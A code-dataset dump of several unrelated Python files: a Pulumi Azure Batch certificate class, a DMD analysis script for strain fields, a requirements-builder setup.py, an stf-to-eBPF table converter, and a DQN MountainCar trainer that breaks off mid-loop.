@pulumi.getter(name="deleteCertificateError")
def delete_certificate_error(self) -> pulumi.Output['outputs.DeleteCertificateErrorResponse']:
"""
This is only returned when the certificate provisioningState is 'Failed'.
"""
return pulumi.get(self, "delete_certificate_error")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
The ETag of the resource, used for concurrency statements.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def format(self) -> pulumi.Output[Optional[str]]:
"""
The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx.
"""
return pulumi.get(self, "format")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="previousProvisioningState")
def previous_provisioning_state(self) -> pulumi.Output[str]:
"""
The previous provisioned state of the resource
"""
return pulumi.get(self, "previous_provisioning_state")
@property
@pulumi.getter(name="previousProvisioningStateTransitionTime")
def previous_provisioning_state_transition_time(self) -> pulumi.Output[str]:
return pulumi.get(self, "previous_provisioning_state_transition_time")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="provisioningStateTransitionTime")
def provisioning_state_transition_time(self) -> pulumi.Output[str]:
return pulumi.get(self, "provisioning_state_transition_time")
@property
@pulumi.getter(name="publicData")
def public_data(self) -> pulumi.Output[str]:
"""
The public key of the certificate.
"""
return pulumi.get(self, "public_data")
@property
@pulumi.getter
def thumbprint(self) -> pulumi.Output[Optional[str]]:
"""
This must match the thumbprint from the name.
"""
return pulumi.get(self, "thumbprint")
@property
@pulumi.getter(name="thumbprintAlgorithm")
def thumbprint_algorithm(self) -> pulumi.Output[Optional[str]]:
"""
This must match the first portion of the certificate name. Currently required to be 'SHA1'.
"""
return pulumi.get(self, "thumbprint_algorithm")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
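# Illustrative usage sketch (not part of the generated SDK; the resource name, account
# name, resource group, and certificate values below are placeholders):
#
#     import pulumi_azure_native as azure_native
#
#     cert = azure_native.batch.v20210601.Certificate(
#         "exampleCert",
#         account_name="examplebatchaccount",
#         resource_group_name="example-rg",
#         certificate_name="sha1-0123456789abcdef0123456789abcdef01234567",
#         data="<base64-encoded .pfx contents>",
#         password="<pfx password>",
#     )
#
#     # Look up an already-provisioned certificate by its provider ID:
#     existing = Certificate.get("existingCert", id=cert.id)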
| 46.603261 | 1,259 | 0.662915 |
35daad5aecd0ac3a78c0c2339cbf51e0014f3f74 | 9,264 | py | Python | RunSEAmodes.py | PapStatMechMat/SeaPy | 1b30792c011a23172a1ce33fe8ebea976561d59a | ["BSD-2-Clause"] | 1 | 2021-05-26T05:16:05.000Z | 2021-05-26T05:16:05.000Z | RunSEAmodes.py | PapStatMechMat/SeaPy | 1b30792c011a23172a1ce33fe8ebea976561d59a | ["BSD-2-Clause"] | null | null | null | RunSEAmodes.py | PapStatMechMat/SeaPy | 1b30792c011a23172a1ce33fe8ebea976561d59a | ["BSD-2-Clause"] | null | null | null |
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from numpy import dot, multiply, diag, power,ones,average
from scipy.signal import convolve2d
from numpy import pi, exp, sin, cos, cosh, tanh, real, imag
from numpy.linalg import inv, eig, pinv
from scipy.linalg import svd, svdvals
from scipy.integrate import odeint, ode, complex_ode
from warnings import warn
import glob,sys,os
from numpy import array, log2, shape, argsort, loadtxt
from numpy.lib.stride_tricks import as_strided as ast
from itertools import product
Rfactor=1
inc_full0=200
inc_test0=140
num_pred=20
import matplotlib as mpl
import numpy as np
from scipy.stats import gaussian_kde
mpl.rc('lines', linewidth=1, color='black')
mpl.rc('font', size=20,family='serif')
mpl.rc('text',color='black')
mpl.rcParams['xtick.major.size']=16
mpl.rcParams['xtick.minor.size']=10
mpl.rcParams['xtick.labelsize']=20
mpl.rcParams['ytick.labelsize']=20
mpl.rcParams['ytick.major.size']=16
mpl.rcParams['ytick.minor.size']=10
mpl.rcParams['grid.linewidth']=2.0
mpl.rcParams['axes.labelsize']=28
mpl.rcParams['legend.fontsize']=20
mpl.rcParams['savefig.dpi']=250
mtype=['o','s','>','<','^','v','p','*','h','D','x','H','.']
ltype=['-','--','-.','-','--','-.','--','-','-.']
col=['b','g','r','c','m','y','brown','cyan','black']
G=1e11
def DislocationState(f):
A=loadtxt(f)
strain_zz=A.copy()
sigma_zz =A.copy() * G
return strain_zz, sigma_zz,shape(A)
def Make2DImageField(z,inc):
fig=plt.figure()
ax1=fig.add_subplot(111)
mpb=ax1.imshow(z)
plt.axis('off')
ax1.set_yticklabels([])
ax1.set_xticklabels([])
#colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8])
fig.colorbar(mpb)
fig.savefig('O_SEA_damage_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True)
return fig,ax1
def Make2DImageSigma(z,inc):
fig=plt.figure()
ax1=fig.add_subplot(111)
mpb=ax1.imshow(z)
plt.axis('off')
ax1.set_yticklabels([])
ax1.set_xticklabels([])
#colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8])
fig.colorbar(mpb)
fig.savefig('O_SEA_sigma_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True)
return fig,ax1
def Make2DImageStrain(z,inc):
fig=plt.figure()
ax1=fig.add_subplot(111)
mpb=ax1.imshow(z)
plt.axis('off')
ax1.set_yticklabels([])
ax1.set_xticklabels([])
#colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8])
fig.colorbar(mpb)
fig.savefig('O_SEA_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True)
return fig,ax1
def Make2DImageTexture(z,inc):
fig=plt.figure()
ax1=fig.add_subplot(111)
from matplotlib import cm
mpb=ax1.imshow(z*10,cmap=cm.gist_ncar,alpha=0.9)
plt.axis('off')
ax1.set_yticklabels([])
ax1.set_xticklabels([])
#colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8])
#fig.colorbar(mpb)
fig.savefig('O_SEA_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True)
return fig,ax1
def MakeStressStrainPlot(s_test, e_test, s_full, e_full, e_pred , inc):
fig=plt.figure()
ax=fig.add_subplot(111)
ax.plot(e_test, s_test, 's',c='blue',alpha=0.75)
axt=ax.twinx()
#axt.plot(e_test, d_test, 's',c='red' ,alpha=0.75)
ax.plot(e_full, s_full, '-' ,c='blue')
#axt.plot(e_full, d_full, '-',c='maroon',lw=1)
#ax.plot(e_full, d_full, '-',c='maroon',lw=1,alpha=0.45,label=' ')
#axt.plot(e_pred, d_pred, '--',c='purple',lw=3,alpha=0.75)
ax.plot([0], [0], '--',c='purple',lw=3,alpha=0.75,label=' ')
#from signalsmooth import smooth
w0=35
e_pred2=e_full #smooth(e_full,window_len=w0)
#print len(e_pred2)
s_pred2=s_full #smooth(s_full,window_len=w0)
#d_pred2=smooth(d_full,window_len=w0)
print(len(s_pred2))
ax.plot([0], [0], '-',c='red',lw=5,alpha=0.4,label=' ')
ax.plot(e_pred2, s_pred2, '-',c='navy',lw=5,alpha=0.5,label=' ')
#axt.plot(e_pred2, 0.95*d_pred2, '-',c='red',lw=5,alpha=0.5)
ax.set_xlabel(r'$\langle\epsilon\rangle$')
ax.set_ylabel(r'$\langle \sigma_{zz}\rangle$'+'(MPa)')
axt.set_ylabel(r'$\langle I_{1}^{(\epsilon)}\rangle$')
"""
ax.set_xlim((0.0,0.0012))
axt.set_ylim(bottom=-0.005)
axt.set_xlim((0.0,0.0012))
ax.set_ylim(bottom=-0.5)
"""
#ax.set_xticks(ax.get_xticks()[::2])
axt.spines['right'].set_color('red')
axt.yaxis.label.set_color('red')
axt.tick_params(axis='y', colors='red')
ax.spines['left'].set_color('blue')
ax.yaxis.label.set_color('blue')
l=ax.legend(loc='upper left')
l.draw_frame(False)
#l=axt.legend(loc='upper left', bbox_to_anchor=(0., 0.))
#l.draw_frame(False)
ax.tick_params(axis='y', colors='blue')
fig.savefig('O_SEA_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True)
#plt.show()
return fig , ax , axt
def BuildDataMatrix(Dms):
return Dms
def Energy(p):
e=array([sum(p[i,:] * p[i,:]) for i in range(len(p[:,0]))])
return e
def MakeImage(P,col,s1,outd):
fig41=plt.figure()
ax41=fig41.add_subplot(111)
print(col,s1,'makeImage')
p0=P[:,col].reshape(s1)
#p0=Energy(p).reshape(s1)
rp0=real(p0)
mpb=plt.imshow(rp0/max(rp0.flatten()))
#plt.clim(0,1e5) # For dislocation examples
plt.axis('off')
ax41.set_yticklabels([])
ax41.set_xticklabels([])
sc=str(col)
# fig41.savefig(outd+'/O_'+sc+'th-InvariantMode_NoCBar.png',bbox_inches='tight', pad_inches = 0, transparent=True)
plt.colorbar(mpb)#,extend='both')
fig41.savefig(outd+'/O_SEA_'+sc+'th-InvariantMode.png',bbox_inches='tight', pad_inches = 0, transparent=True)
#plt.title(sc+'-th Damage Mode')
#fig=plt.figure()
#ax=fig.add_subplot(111)
#colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8])
#fig.colorbar(mpb)
return None
def MakeImagePred(P,col,s1,eps,outd):
fig41=plt.figure()
ax41=fig41.add_subplot(111)
p=P.reshape(s1)
sav=real(p.flatten().mean())
p0=p #Energy(p).reshape(s1)
rp0=real(p0)
print(rp0.flatten().mean(),rp0.flatten().max())
mpb=plt.imshow(rp0)
plt.clim(-.1,.1)
plt.axis('off')
ax41.set_yticklabels([])
ax41.set_xticklabels([])
sc=str(format(eps,'.0e'))[:]
#fig41.savefig('O_'+sc+'th-StepInvariant.png',bbox_inches='tight', pad_inches = 0, transparent=True)
plt.colorbar(mpb)#,extend='both')
fig41.savefig(outd+'/O_SEA_'+sc+'th-StepStrainInvariant_WithCbar.png',bbox_inches='tight', pad_inches = 0, transparent=True)
#plt.title(' Damage Field '+r'$\phi$'+' at '+r'$\epsilon=$'+sc)
return sav
def MakePlot_SV(Sig,r,outd):
####Plotting
fig2=plt.figure()
ax2=fig2.add_subplot(111)
ax2.plot(Sig,'s',markersize=20)
ax2.set_xlabel('index '+r'$j$')
ax2.set_ylabel(r'$\varsigma_j$')
ax2.set_xlim((-0.2,r))
fig2.tight_layout()
fig2.savefig(outd+'/O_SEA_SV.png',bbox_inches='tight', pad_inches = 0, transparent=True)
############
return fig2,ax2
def MakePlot_Eigen(mu,outd):
t0 = np.linspace(0, 2*pi, 20)
fig3=plt.figure()
ax3=fig3.add_subplot(111)
ax3.plot(real(mu),imag(mu),'s',markersize=20)
ax3.plot(cos(t0), sin(t0),'--')
ax3.set_xlabel(r'$Re(\mu)$')
ax3.set_ylabel(r'$Im(\mu)$')
fig3.tight_layout()
fig3.savefig(outd+'/O_SEA_Eigen.png',bbox_inches='tight', pad_inches = 0, transparent=True)
return fig3,ax3,t0
def Predict(Phi,b,mu,s,t,r,outd):
print(t,'--t')
dt=t[1]-t[0]
tmin=min(t)
tmax=max(t)
t2 = np.linspace(tmin, tmax, num_pred)
Psi = np.zeros([r, len(t2)], dtype='complex')
for i,_x in enumerate(t2):
print(_x,'_x')
print(b,'b')
print(i)
print(shape(Psi))
Psi[:,i] = multiply(power(mu, _x/dt), b)
# compute DMD reconstruction
D2 = dot(Phi, Psi)
#np.allclose(D, D2) # True
sigmaps=[]
tps=[]
for i in range(len(D2[0,:])):
print(str(i)+'--predicted...'+str(t2[i]))
F=D2[:,i]
if i==0: #subtract background
F0=average(F)
eps=t2[i]
sigma=MakeImagePred((F-F0),i,s,eps,outd)
tps.append(t2[i])
sigmaps.append(sigma+eps)
return tps,sigmaps
def Perform_and_PredictFuture(D0,eps,s,outd):
D=D0.T #Data Matrix
X=D[:,:-1]
Y=D[:,1:]
# SVD of input matrix
U2,Sig2,Vh2 = svd(X, False)
r = 5 # rank-5 truncation
fig_SV,ax_SV=MakePlot_SV(Sig2,r,outd)
U = U2[:,:r]
Sig = diag(Sig2)[:r,:r]
V = Vh2.conj().T[:,:r]
# build A tilde
Atil = dot(dot(dot(U.conj().T, Y), V), inv(Sig))
mu,W = eig(Atil)
fig_Eigen,ax_Eigen,t0=MakePlot_Eigen(mu,outd)
# build DMD modes
Phi = dot(dot(dot(Y, V), inv(Sig)), W)
MakeImage(Phi,0,s,outd)
MakeImage(Phi,1,s,outd)
MakeImage(Phi,2,s,outd)
MakeImage(Phi,3,s,outd)
# compute time evolution
b = dot(pinv(Phi), X[:,1])
tps,sigmaps=Predict(Phi,b,mu,s,eps,r,outd)
return tps,sigmaps
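# Note on the linear algebra in Perform_and_PredictFuture (standard exact-DMD recipe):
# with snapshot pairs X = D[:, :-1] and Y = D[:, 1:] and the rank-r truncated SVD
# X ~= U Sig V*, the reduced operator is Atil = U* Y V Sig^{-1}; its eigenpairs
# (mu, W) give the DMD eigenvalues, and Phi = Y V Sig^{-1} W are the exact DMD modes.
# Predict() then extrapolates snapshots as D(t) ~= Phi diag(mu**(t/dt)) b, where the
# amplitudes are b = pinv(Phi) X[:, 1] as computed above.
# Typical driver call (a sketch; arguments must match the data matrix, strain levels,
# field shape, and output directory built by the calling script):
#     tps, sigmaps = Perform_and_PredictFuture(D0, eps, s, outd)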
| 33.323741 | 128 | 0.614961 |
1f3fcca34de84aa8bf6265a50647d694d96fc92e | 2,475 | py | Python | setup.py | cclauss/requirements-builder | ec2e84b974290aaefa71b5ce19d0c343d29efffa | ["BSD-3-Clause"] | null | null | null | setup.py | cclauss/requirements-builder | ec2e84b974290aaefa71b5ce19d0c343d29efffa | ["BSD-3-Clause"] | null | null | null | setup.py | cclauss/requirements-builder | ec2e84b974290aaefa71b5ce19d0c343d29efffa | ["BSD-3-Clause"] | null | null | null |
# -*- coding: utf-8 -*-
#
# This file is part of Requirements-Builder
# Copyright (C) 2015, 2016, 2017, 2018 CERN.
#
# Requirements-Builder is free software; you can redistribute it and/or
# modify it under the terms of the Revised BSD License; see LICENSE
# file for more details.
#
"""Build requirements files from setup.py requirements."""
import os
from setuptools import setup
# Get the version string. Cannot be done with import!
g = {}
with open(os.path.join('requirements_builder', 'version.py'), 'rt') as fp:
exec(fp.read(), g)
version = g['__version__']
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('CHANGES.rst') as history_file:
history = history_file.read().replace('.. :changes:', '')
install_requires = [
'click>=6.1.0',
'mock>=1.3.0',
]
tests_require = [
'check-manifest>=0.25',
'coverage>=4.0',
'isort>=4.0.0',
'pydocstyle>=1.0.0',
'pytest-cache>=1.0',
'pytest-cov>=2.0.0',
'pytest-pep8>=1.0.6',
'pytest>=2.8.0',
]
extras_require = {
'docs': [
'Sphinx<1.5.0,>=1.4.2',
'docutils<0.13,>=0.12',
],
'tests': tests_require,
}
extras_require['all'] = extras_require['tests'] + extras_require['docs']
setup_requires = ['pytest-runner>=2.6.2', ]
setup(
name='requirements-builder',
version=version,
description=__doc__,
long_description=readme + '\n\n' + history,
author="Invenio Collaboration",
author_email='info@inveniosoftware.org',
url='https://github.com/inveniosoftware/requirements-builder',
entry_points={
'console_scripts':
["requirements-builder = requirements_builder.cli:cli"]
},
packages=['requirements_builder', ],
include_package_data=True,
extras_require=extras_require,
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_require,
license='BSD',
zip_safe=False,
keywords='requirements-builder',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
)
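# Typical use of the console script declared above (illustrative; the --level flag and
# its min/pypi/dev choices are assumed from the project's documentation, not defined in
# this file):
#     requirements-builder --level=min setup.py > requirements.min.txt
#     requirements-builder --level=pypi setup.py > requirements.txt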
| 27.5 | 74 | 0.63596 |
2666542ec3037f792e3650bf4b928959ac13f8c9 | 5,743 | py | Python | backends/ebpf/targets/ebpfstf.py | Abe149/p4c | 4a40ce4a15957de76e3a161c3778f1f0b6ac5780 | ["Apache-2.0"] | null | null | null | backends/ebpf/targets/ebpfstf.py | Abe149/p4c | 4a40ce4a15957de76e3a161c3778f1f0b6ac5780 | ["Apache-2.0"] | null | null | null | backends/ebpf/targets/ebpfstf.py | Abe149/p4c | 4a40ce4a15957de76e3a161c3778f1f0b6ac5780 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python3
# Copyright 2018 VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Converts the commands in an stf file which populate tables into a C
program that manipulates ebpf tables. """
import os
import sys
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + '/../../tools')
from testutils import *
from stf.stf_parser import STFParser
class eBPFCommand(object):
""" Defines a match-action command for eBPF programs"""
def __init__(self, a_type, table, action, priority="", match=[], extra=""):
        self.a_type = a_type  # command type: "add" or "setdefault"
        self.table = table  # name of the match-action table to update
        self.action = action  # action name and its parameter list
        self.priority = priority  # optional priority of the table entry
        self.match = match  # list of (field, value) match-key pairs
        self.extra = extra  # any trailing arguments of the stf command
def _generate_control_actions(cmds):
""" Generates the actual control plane commands.
This function inserts C code for all the "add" commands that have
been parsed. """
generated = ""
for index, cmd in enumerate(cmds):
key_name = "key_%s%d" % (cmd.table, index)
value_name = "value_%s%d" % (cmd.table, index)
if cmd.a_type == "setdefault":
tbl_name = cmd.table + "_defaultAction"
generated += "u32 %s = 0;\n\t" % (key_name)
else:
generated += "struct %s_key %s = {};\n\t" % (cmd.table, key_name)
tbl_name = cmd.table
for key_num, key_field in enumerate(cmd.match):
field = key_field[0].split('.')[1]
generated += ("%s.%s = %s;\n\t"
% (key_name, field, key_field[1]))
generated += ("tableFileDescriptor = "
"BPF_OBJ_GET(MAP_PATH \"/%s\");\n\t" %
tbl_name)
generated += ("if (tableFileDescriptor < 0) {"
"fprintf(stderr, \"map %s not loaded\");"
" exit(1); }\n\t" % tbl_name)
generated += ("struct %s_value %s = {\n\t\t" % (
cmd.table, value_name))
if cmd.action[0] == "_NoAction":
generated += ".action = 0,\n\t\t"
else:
action_full_name = "{}_ACT_{}".format(cmd.table.upper(), cmd.action[0].upper())
generated += ".action = %s,\n\t\t" % action_full_name
generated += ".u = {.%s = {" % cmd.action[0]
for val_num, val_field in enumerate(cmd.action[1]):
generated += "%s," % val_field[1]
generated += "}},\n\t"
generated += "};\n\t"
generated += ("ok = BPF_USER_MAP_UPDATE_ELEM"
"(tableFileDescriptor, &%s, &%s, BPF_ANY);\n\t"
% (key_name, value_name))
generated += ("if (ok != 0) { perror(\"Could not write in %s\");"
"exit(1); }\n" % tbl_name)
return generated
def create_table_file(actions, tmpdir, file_name):
""" Create the control plane file.
The control commands are provided by the stf parser.
This generated file is required by ebpf_runtime.c to initialize
the control plane. """
err = ""
try:
with open(tmpdir + "/" + file_name, "w+") as control_file:
control_file.write("#include \"test.h\"\n\n")
control_file.write("static inline void setup_control_plane() {")
control_file.write("\n\t")
control_file.write("int ok;\n\t")
control_file.write("int tableFileDescriptor;\n\t")
generated_cmds = _generate_control_actions(actions)
control_file.write(generated_cmds)
control_file.write("}\n")
except OSError as e:
err = e
return FAILURE, err
return SUCCESS, err
def parse_stf_file(raw_stf):
""" Uses the .stf parsing tool to acquire a pre-formatted list.
Processing entries according to their specified cmd. """
parser = STFParser()
stf_str = raw_stf.read()
stf_map, errs = parser.parse(stf_str)
input_pkts = {}
cmds = []
expected = {}
for stf_entry in stf_map:
if stf_entry[0] == "packet":
input_pkts.setdefault(stf_entry[1], []).append(bytes.fromhex(''.join(stf_entry[2].split())))
elif stf_entry[0] == "expect":
interface = int(stf_entry[1])
pkt_data = stf_entry[2]
expected.setdefault(interface, {})
if pkt_data != '':
expected[interface]["any"] = False
expected[interface].setdefault(
"pkts", []).append(pkt_data)
else:
expected[interface]["any"] = True
elif stf_entry[0] == "add":
cmd = eBPFCommand(
a_type=stf_entry[0], table=stf_entry[1],
priority=stf_entry[2], match=stf_entry[3],
action=stf_entry[4], extra=stf_entry[5])
cmds.append(cmd)
elif stf_entry[0] == "setdefault":
cmd = eBPFCommand(
a_type=stf_entry[0], table=stf_entry[1], action=stf_entry[2])
cmds.append(cmd)
return input_pkts, cmds, expected
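# Illustrative driver (not part of this module): parse an stf file and emit the
# control-plane header consumed by the eBPF runtime. "test.stf", "/tmp/ebpf", and
# "control.h" are placeholder names.
#     with open("test.stf") as raw_stf:
#         input_pkts, cmds, expected = parse_stf_file(raw_stf)
#     result, err = create_table_file(cmds, "/tmp/ebpf", "control.h")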
| 41.615942 | 104 | 0.58001 |
2a77aa3a4fd9eea90d9ccee3698d69828f3f2a0c | 11,685 | py | Python | mtcar-lossgraph/mountaincar-solver-lossgraph.py | hushon/son-dqn | 08b9bdce8b570a629b8484d21b06146335f5907e | ["Apache-2.0"] | null | null | null | mtcar-lossgraph/mountaincar-solver-lossgraph.py | hushon/son-dqn | 08b9bdce8b570a629b8484d21b06146335f5907e | ["Apache-2.0"] | null | null | null | mtcar-lossgraph/mountaincar-solver-lossgraph.py | hushon/son-dqn | 08b9bdce8b570a629b8484d21b06146335f5907e | ["Apache-2.0"] | null | null | null |
## Original implementation from https://github.com/ageron/tiny-dqn
## Edited to solve OpenAI Gym classic environments by github.com/hushon
from __future__ import division, print_function, unicode_literals
# Handle arguments (before slow imports so --help can be fast)
import argparse
parser = argparse.ArgumentParser(
description="Train a DQN net to play OpenAI Gym classic environments.")
parser.add_argument("-e", "--environment", action="store", default="MountainCar-v0",
help="name of the Gym environment")
parser.add_argument("-n", "--number-steps", type=int, default=10000,
help="total number of training steps")
parser.add_argument("-l", "--learn-iterations", type=int, default=1,
help="number of game iterations between each training step")
parser.add_argument("-s", "--save-steps", type=int, default=400,
help="number of training steps between saving checkpoints")
parser.add_argument("-c", "--copy-steps", type=int, default=20,
help="number of training steps between copies of online DQN to target DQN")
parser.add_argument("-r", "--render", action="store_true", default=False,
help="render the game during training or testing")
parser.add_argument("-p", "--path", default="./MountainCar-v0/my_dqn.ckpt",
help="path of the checkpoint file")
parser.add_argument("-t", "--test", action="store_true", default=False,
help="test (no learning and minimal epsilon)")
parser.add_argument("-v", "--verbosity", action="count", default=0,
help="increase output verbosity")
args = parser.parse_args()
from time import sleep
from collections import deque
import gym
from gym import wrappers
import numpy as np
import os
import tensorflow as tf
import matplotlib.pyplot as plt
env = gym.make(args.environment)
if args.test: env = wrappers.Monitor(env, args.path+'/mountaincar-experiment-1')
done = True # env needs to be reset
# First let's build the two DQNs (online & target)
n_outputs = env.action_space.n # 3 discrete actions are available
num_outputs_list = [1024, 512] # number of units in input layer and hidden layer
activation_list = [tf.nn.relu, tf.nn.relu] # activation function in input layer and hidden layer
weights_initializer = tf.contrib.layers.xavier_initializer()
# biases_initializer = tf.zeros_initializer()
biases_initializer = tf.contrib.layers.xavier_initializer()
def q_network(X_state, name):
prev_layer = X_state
with tf.variable_scope(name) as scope:
# input layer and hidden layers
for num_outputs, activation in zip(num_outputs_list, activation_list):
prev_layer = tf.contrib.layers.fully_connected(
prev_layer,
num_outputs,
activation_fn=activation,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=weights_initializer,
weights_regularizer=None,
biases_initializer=biases_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None)
# output layer
outputs = tf.contrib.layers.fully_connected(
prev_layer,
n_outputs,
activation_fn=None,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=weights_initializer,
weights_regularizer=None,
biases_initializer=biases_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None)
trainable_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,
scope=scope.name)
trainable_vars_by_name = {var.name[len(scope.name):]: var
for var in trainable_vars}
return outputs, trainable_vars_by_name
# state_shape = (2*np.prod(env.observation_space.shape), )
state_shape = (np.prod(env.observation_space.shape), )
X_state = tf.placeholder(tf.float32, shape=[None]+list(state_shape))
online_q_values, online_vars = q_network(X_state, name="q_networks/online")
target_q_values, target_vars = q_network(X_state, name="q_networks/target")
# We need an operation to copy the online DQN to the target DQN
copy_ops = [target_var.assign(online_vars[var_name])
for var_name, target_var in target_vars.items()]
copy_online_to_target = tf.group(*copy_ops)
# Now for the training operations
learning_rate = 0.2
momentum = 0.0
with tf.variable_scope("train"):
X_action = tf.placeholder(tf.int32, shape=[None])
y = tf.placeholder(tf.float32, shape=[None, 1])
q_value = tf.reduce_sum(online_q_values * tf.one_hot(X_action, n_outputs), axis=1, keep_dims=True)
error = tf.abs(y - q_value)
# clipped_error = tf.clip_by_value(error, 0.0, 1.0)
# linear_error = 2 * (error - clipped_error)
# loss = tf.reduce_mean(tf.square(clipped_error) + linear_error)
loss = tf.reduce_mean(tf.square(error))
global_step = tf.Variable(0, trainable=False, name='global_step')
optimizer = tf.train.MomentumOptimizer(
learning_rate, momentum, use_nesterov=True)
training_op = optimizer.minimize(loss, global_step=global_step)
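# The placeholder `y` above receives the one-step TD target computed later in the
# training loop from the frozen target network:
#     y = reward + (1 - done) * discount_rate * max_a' Q_target(next_state, a')
# so minimizing the mean squared `error` is the standard DQN update of the online
# network (see the sess.run([training_op, loss], ...) call in the main loop).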
init = tf.global_variables_initializer()
saver = tf.train.Saver()
# Let's implement a simple replay memory
# replay_memory_size = 20000
replay_memory_size = 50000
replay_memory = deque([], maxlen=replay_memory_size)
def sample_memories(batch_size):
indices = np.random.permutation(len(replay_memory))[:batch_size]
cols = [[], [], [], [], []] # state, action, reward, next_state, continue
for idx in indices:
memory = replay_memory[idx]
for col, value in zip(cols, memory):
col.append(value)
cols = [np.array(col) for col in cols]
return (cols[0], cols[1], cols[2].reshape(-1, 1), cols[3], cols[4].reshape(-1, 1))
# And on to the epsilon-greedy policy with decaying epsilon
eps_min, eps_max = (0.5, 1.0) if not args.test else (0.0, 0.0)
eps_decay_steps = args.number_steps // 2
# eps_decay_steps = args.number_steps
def epsilon_greedy(q_values, step):
epsilon = max(eps_min, eps_max - (eps_max-eps_min) * step/eps_decay_steps)
if np.random.rand() < epsilon:
print("random")
return np.random.randint(n_outputs) # random action
else:
return np.argmax(q_values) # optimal action
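# Worked example of the schedule: with the defaults (number_steps=10000, so
# eps_decay_steps=5000) and training-mode bounds eps_min=0.5, eps_max=1.0, epsilon
# decays linearly from 1.0 at step 0 to 0.5 at step 5000 and is clamped at 0.5 afterwards.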
# We need to preprocess the images to speed up training
# preprocessor merges observations and returnes a flattened array
def preprocess_observation(*arg):
obs_stacked = np.vstack(arg)
obs_stacked = np.around(obs_stacked, decimals=4)
# q = 0.01
# obs_stacked = q*np.round(obs_stacked/q)
return obs_stacked.reshape(-1)
# TensorFlow - Execution phase
training_start = 0 # number of game iterations to collect before training starts (0 = no warm-up)
discount_rate = 1.00
skip_start = 0 # Skip the start of every game (it's just waiting time).
batch_size = 500
iteration = 0 # game iterations
done = True # env needs to be reset
# We will keep track of the max Q-Value over time and compute the mean per game
loss_val = np.infty
game_length = 0
total_max_q = 0
mean_max_q = 0.0
# flag for successful game
success = False
# flag for intrinsic reward
check1 = False
check2 = False
check3 = False
# frame skipping by k frames
skip_k = 10
# for plotting loss
plt.figure(1)
loss_list = np.zeros(args.number_steps)
with tf.Session() as sess:
if os.path.isfile(args.path + ".index"):
saver.restore(sess, args.path)
else:
init.run()
copy_online_to_target.run()
while True:
step = global_step.eval()
if step >= args.number_steps and not args.test:
break
iteration += 1
if args.verbosity > 0:
print("\rIteration {} Training step {}/{} ({:.1f})% Loss {:5f} Mean Max-Q {:5f} ".format(
iteration, step, args.number_steps, step * 100 / args.number_steps, loss_val, mean_max_q), end="")
if done: # game over, start again
print("Game Over")
obs = env.reset()
for skip in range(skip_start): # skip the start of each game
obs, reward, done, info = env.step(0)
# state = preprocess_observation(obs, obs)
state = preprocess_observation(obs)
obs_old = obs
if args.render:
env.render()
# Online DQN evaluates what to do
print(state)
q_values = online_q_values.eval(feed_dict={X_state: [state]})
print(q_values)
action = epsilon_greedy(q_values, step)
print(("left", "stay", "right")[action])
# Online DQN plays
# for k in range(skip_k):
# obs, reward, done, info = env.step(action)
# if reward > -1.0:
# break
obs, reward, done, info = env.step(action)
# next_state = preprocess_observation(obs, obs_old)
next_state = preprocess_observation(obs)
obs_old = obs
# flag for success
if obs[0]-4.9 >= 0:
success=True
done = True
reward = 100.0
if success:
print("successful episode observed")
# reward manipulation
# coeff = -1e3
# reward += coeff*(state[0]-state[2])*(-1,0,1)[action]
# print(reward)
# coeff = 1e5
# reward += coeff*np.square(state[3])
# print(reward)
# coeff=4
# intrinsic_reward = coeff*(np.square(state[0]+0.5)+160.0*np.square(state[1]))
# print(intrinsic_reward)
# reward += intrinsic_reward
# if not check1 and not check2 and not check3 and obs[0]<-0.7:
# reward = 0.0
# check1 = True
# elif check1 and not check2 and not check3 and obs[0]>-0.3:
# reward = 0.0
# check2 = True
# elif check1 and check2 and not check3 and obs[0]>0.0:
# reward = 0.0
# check3 = True
# Let's memorize what happened
replay_memory.append((state, action, reward, next_state, 1.0 - done))
state = next_state
if args.test:
continue
# Compute statistics for tracking progress (not shown in the book)
